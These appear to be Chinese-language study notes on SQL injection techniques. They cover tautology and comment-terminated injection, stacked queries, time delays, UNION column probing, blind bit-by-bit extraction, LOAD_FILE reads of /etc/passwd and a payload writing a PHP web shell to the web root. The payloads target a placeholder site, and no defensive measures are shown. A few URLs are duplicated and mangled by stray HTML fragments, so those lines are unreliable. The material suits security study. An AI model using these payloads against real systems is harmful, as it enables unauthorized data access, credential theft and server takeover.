SQL注入攻击和防御

部分整理。。。

什么是SQL注入？

简单的例子，对于一个购物网站，可以允许搜索，price小于某值的商品

这个值用户是可以输入的，比如，100

但是对于用户，如果输入，100' OR '1'='1

结果最终产生的sql，

SELECT *

FROM ProductsTbl

WHERE Price < '100.00' OR '' = ''

ORDER BY ProductDescription;

这样用户可以获取所有的商品信息

再看个例子，

对于用户身份认证，需要输入用户名和密码

但是如果用户在密码里面加入注入代码，

SELECT userid

FROM CMSUsers

WHERE user = 'foo' AND password = 'password' OR '' = '';

这样就一定可以通过验证

注入类型

内联 SQL 注入(Inline SQL Injection)

内联注入是指向查询注入一些SQL 代码后，原来的查询仍然会全部执行

字符串内联注入

例子，

通过下面的sql，把users 表中所有密码都更新为new_password，相当严重

UPDATE users

SET password = 'new_password'

WHERE username = 'Bob' and password = 'old_password' OR ''=''

数字值内联注入

请注意，注入数字时不需要添加开始和结尾的单引号定界符。

SELECT *

FROM messages

WHERE uid=45 or 1=1 /* 永真条件 */

ORDER BY received;

由于注入了永真条件(or 1=1)，因而数据库将返回message 表中所有的行，而不仅仅是那些发送给某个用户的行

终止式SQL 注入

终止式SQL 注入是指攻击者在注入SQL 代码时，通过将原查询语句的剩余部分注释掉，从而成功结束原来的查询语句。

例子，

注入“' or 1=1;--”代码

SELECT *

FROM administrators

WHERE username = '' or 1=1;-- ' AND password = '';

由于存在 1=1 永真条件，该语句将返回administrators 表中所有的行。

SELECT *

FROM administrators

WHERE username = 'admin'/*' AND password = '*/ '';

有时您会发现在某些场合无法使用双连字符(—)。
在这种情况下，可以使用多行注释(/* */)来替换SQL语句中原来的注释。

该技术要求存在多个易受攻击的参数，而且您要了解这些参数在SQL 语句中的位置。

执行多条语句

SQL Server 6.0 在其架构中引入了服务端游标，从而允许在同一连接句柄上执行包含多条语句的字符串。

所有6.0 之后的SQL Server 版本均支持该功能且允许执行下列语句：

SELECT foo FROM bar; SELECT foo2 FROM bar2;

MySQL 在4.1 及之后的版本中也引入了该功能，但它在默认情况下并不支持该功能。

要利用该技术，您首先需要能够终止第一条语句，这样您之后才可以连接任意的SQL 代码。

例子，

http://www.victim.com/search.php?s=test';SELECT '<?php echo shell_

exec($_GET["cmd"]);?>' INTO OUTFILE '/var/www/victim.com/shell.

php';--

时间延迟

时间延迟是一种很强大的技术，Web 服务器虽然可以隐藏错误或数据，但必须等待数据库返回结果，因此可用它来确认是否存在SQL 注入。该技术尤其适合盲注。

Microsoft SQL Server 服务器包含一条向查询引入延迟的内置命令：WAITFOR DELAY 'hours:minutes:seconds'。
例如，向Victim 公司的Web 服务器发送下列请求，服务器的响应大概要花5 秒：

http://www.victim.com/basket.aspx?uid=45;waitfor delay '0:0:5';--

服务器响应中的延迟使我们确信我们正在向后台数据库注入 SQL 代码

MySQL 数据库没有与WAITFOR DELAY 等价的命令，但它可以使用执行时间很长的函数来引入延迟。BENCHMARK 函数是很好的选择

mysql> SELECT BENCHMARK(10000000,ENCODE('hello','mom'));

注入攻击方式

注入首先要确定后端具体是什么数据库，具体是什么版本
方法取决于是否blind，即web服务器是否会把后端的错误或返回值，返回给你

基本的方法就是用，不同数据库的有差异的语法来验证，

比如对于字符串的拼接，各个库的语法是不一样的

Extracting data through UNION statements

通过union可以增加自己的sql，获取更多的信息

SELECT column-1,column-2,…,column-N FROM table-1

UNION

SELECT column-1,column-2,…,column-N FROM table-2

这种方法的限制是，

• The two queries must return exactly the same number of columns.
• The data in the corresponding columns of the two SELECT statements must be of the same (or at least compatible) types.

如何保证你的sql和原始sql具有相同的column个数和类型呢？

方法就是，你可以一个个试，

http://www.victim.com/products.asp?id=12+union+select+null--

http://www.victim.com/products.asp?id=12+union+select+null,null--

http://www.victim.com/products.asp?id=12+union+select+null,null,null--

一直试到不报错为止

对于类型也是一样，

http://www.victim.com/products.asp?id=12+union+select+‘test’,NULL,NULL,NULL

http://www.victim.com/products.asp?id=12+union+select+NULL,‘test’,NULL,NULL

试到不报错，说明类型匹配

例子，

For instance, the following URL would retrieve both the name of the current user and the name of the current database:

http://www.victim.com/products.asp?id=12+union+select+NULL,system_user,db_name(),NULL

Using conditional statements

各种数据库的条件语法，

Approach 1: Time-Based

On SQL Server, for instance, one of the first things you might want to know is whether the user performing the queries is the system administrator account, sa.

http://www.victim.com/products.asp?id=12;if+(system_user=‘sa’)+WAITFOR+DELAY+‘0:0:5’--

Approach 2: Error-Based

http://www.victim.com/products.asp?id=12/is_srvrolemember(‘sysadmin’)

如果后面的函数返回1，那么12/1，仍然等于12; 如果返回0，12/0明显会有异常，这样可以推断后面函数的值

As an example, let’s see how we can use a CASE statement to check, in our e-commerce application, whether the current user is sa:

http://www.victim.com/products.asp?id=12/(case+when+(system_user=‘sa’)+then+1+else+0+end)

Approach 3: Content-Based

可以避免产生错误，

http://www.victim.com/products.asp?id=12%2B(case+when+(system_user+=+‘sa’)+then+1+else+0+end)

比如上面的case，

把除改成求余

Working with Strings

http://www.victim.com/search.asp?brand=acme

等同于，

http://www.victim.com/search.asp?brand=acm‘%2B’e 或 http://www.victim.com/search.asp?brand=ac‘%2B’m‘%2B’e

因为%2B，转义为+

也等同于，

http://www.victim.com/search.asp?brand=ac‘%2Bchar(109)%2B’e

下面可以这样来注入，

http://www.victim.com/search.asp?brand=ac‘%2Bchar(108%2B(case+when+(system_user+=+‘sa’)+then +1+else+0+end)%2B’e

根据条件判断，

http://www.victim.com/search.asp?brand=acme

或

http://www.victim.com/search.asp?brand=acle

上面的攻击只能获取1个bit的数据，这种攻击可以扩展成，对len的判断，以用二分法确定len

+8)+then+1+else+0+end" href="http://www.victim.com/products.asp?id=10/(case+when+(len(system_user)+>+8)+then+1+else+0+end">+8)+then+1+else+0+end" href="http://www.victim.com/products.asp?id=10/(case+when+(len(system_user)+>+8)+then+1+else+0+end">http://www.victim.com/products.asp?id=10/(case+when+(len(system_user)+>+8)+then+1+else+0+end

继而可以用二分法找出每个char，

+128)+then+1+else+0+end)" href="http://www.victim.com/products.asp?id=12/(case+when+(ascii(substring(select+system_user),1,1))+>+128)+then+1+else+0+end">+128)+then+1+else+0+end)" href="http://www.victim.com/products.asp?id=12/(case+when+(ascii(substring(select+system_user),1,1))+>+128)+then+1+else+0+end">http://www.victim.com/products.asp?id=12/(case+when+(ascii(substring(select+system_user),1,1))+>+128)+then+1+else+0+end)

Exploiting the operating system

Accessing the file system

读，

The LOAD_FILE function also handles binary files transparently, which means that with a little bit of finesse we can use the function to read binary files from the remote host easily:

如，

‘ union select LOAD_FILE(‘/etc/passwd’)#

insert into foo set line=load_file(‘/tmp/temp.bin’);

写，

aaa’ union select NULL,‘SensePost 2008\n’ into dumpfile ‘/tmp/sp.txt’#

Executing operating system commands

Exploiting second-order SQL injection

第一次攻击请求，只是把攻击脚本，写入storage，如数据库

第二次请求，会把攻击脚本从库中读出，触发执行，此时才会产生真正的攻击

Finding Second-Order Vulnerabilities

Second-order SQL injection is more difficult to detect than first-order vulnerabilities, because your exploit is submitted in one request and executed in the application’s handling of a different request.